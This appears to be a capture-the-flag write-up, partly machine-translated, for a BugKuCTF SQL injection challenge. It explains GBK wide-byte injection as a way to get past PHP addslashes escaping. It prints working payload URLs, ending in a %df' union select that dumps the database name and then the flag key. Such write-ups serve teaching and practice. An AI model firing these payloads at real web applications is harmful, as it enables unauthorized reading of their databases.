BugKuCTF—sql injection Writeup
The original title address http://103.238.227.13:10083/
first construct the link
http://103.238.227.13:10083/?id=1'
It is found that there is filtering, and the page does not respond. Right-click the source file and find the encoding rule GB-2312, guessing it is mysql wide byte injection
Briefly explain what wide byte injection is :
1. After the server GETs the data sent from the front end, it can filter specific characters through functions such as php addslashes, mysql_real_escape_string, mysql_escape_string, and add escape characters in front of it. This makes these specific characters invalid when splicing sql statements later. The
filtered characters include
(1) ASCII(NULL)字符\x00,
(2) 换行字符\n,addslashes不转义
(3) 回车字符\r,addslashes不转义
(4) 反斜杠字符\,
(5) 单引号字符',
(6) 双引号字",
(7) \x1a,addslashes不转义
2. When mysql uses GBK encoding, it will consider two characters as one Chinese character. When we write the injection connection as
http://103.238.227.13:10083/?id=1%df'
After %df' is sent to the background php for processing, it becomes %df\' . At this time, the code corresponding to %df\' is %df%5c' , that is, the Chinese character " yun' ", which is equivalent to using php for filtering and The added escape character \ is swallowed to bypass the filter.
Continue the previous question, use the wide byte injection structure to inject the POC, and explode the library name
http://103.238.227.13:10083/?id=1%df' union select 1,database() %23
Here %23 is the character #, a special character for comments in mysql, comment out the following quotation marks to
find database sql5, and then construct the POC according to the prompt to get the flag
http://103.238.227.13:10083/?id=1%df' union select 1,string from sql5.key %23